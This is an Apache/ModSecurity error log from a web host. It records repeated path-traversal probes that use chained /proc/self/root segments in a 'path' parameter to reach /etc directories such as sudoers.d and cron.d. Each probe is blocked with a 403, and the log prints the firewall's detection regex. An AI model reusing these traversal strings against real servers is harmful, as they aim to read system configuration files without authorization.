[Fri Mar 20 03:09:38.095063 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.243.128:44512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkovXLqtnMIWvjpaJjTQAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:43.227319 2026] [:error] [pid 7235:tid 140411590858496] [client 74.7.241.31:46952] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkp_qxLDW4GITHUkSs5QAAARI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:45.884612 2026] [:error] [pid 7893:tid 140411632822016] [client 74.7.241.31:46968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkqRCii7xarUs8iHYubwAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:49.551873 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.241.31:37610] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkrfu8EFLIOrSqIpvpLAAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:09:57.081877 2026] [proxy_fcgi:error] [pid 31215:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:48320] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:10:02.786916 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.241.31:37612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkugF0L0L-SsrnPo4ybwAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:10:08.174976 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:35974] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkwPu8EFLIOrSqIpvpOQAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:10:14.862648 2026] [:error] [pid 8307:tid 140411616036608] [client 74.7.241.31:35978] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkxr-FhjpZGs9ba8qvHAAAAw8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:10:22.131047 2026] [proxy_fcgi:error] [pid 8307:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:49210] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:10:25.068806 2026] [core:alert] [pid 21219:tid 140411716749056] [client 57.141.18.117:55208] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 03:10:40.983471 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.241.31:48756] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzk4Pu8EFLIOrSqIpvpTAAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:10:42.513560 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.243.128:44512] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzk4vXLqtnMIWvjpaJjmgAAAo4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:10:45.002905 2026] [:error] [pid 30077:tid 140411599251200] [client 74.7.241.31:50706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzk5Pu8EFLIOrSqIpvpTwAAAlE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:10:46.530919 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:56290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzk5ta6ubjKNq_cu4aZIgAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:10:50.102360 2026] [proxy_fcgi:error] [pid 7893:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:50136] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:10:50.338742 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:56298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzk6da6ubjKNq_cu4aZJgAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:10:52.399278 2026] [:error] [pid 7893:tid 140411658000128] [client 74.7.243.128:50160] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzk7BCii7xarUs8iHYupAAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:10:52.868966 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.241.31:37394] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzk7PqxLDW4GITHUkStHQAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:10:54.251748 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:50172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzk7uoXxyEfFpUF8f9OZgAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:10:54.607726 2026] [:error] [pid 7235:tid 140411565680384] [client 74.7.241.31:37398] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzk7vqxLDW4GITHUkStHwAAARU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:10:57.827439 2026] [:error] [pid 31215:tid 140411674785536] [client 74.7.241.31:55656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzk8QF0L0L-SsrnPo4yiwAAAsg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:11:02.235095 2026] [:error] [pid 8307:tid 140411599251200] [client 74.7.241.31:55658] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzk9r-FhjpZGs9ba8qvPQAAAxE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:11:22.149783 2026] [proxy_fcgi:error] [pid 30077:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:51220] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:11:23.735030 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:48770] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzlC9a6ubjKNq_cu4aZSgAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:11:30.872307 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:50186] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzlEgkwaGbbGflqUZAPVgAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:11:34.320555 2026] [:error] [pid 15826:tid 140411725141760] [client 74.7.241.31:47760] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzlFuoXxyEfFpUF8f9OhQAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
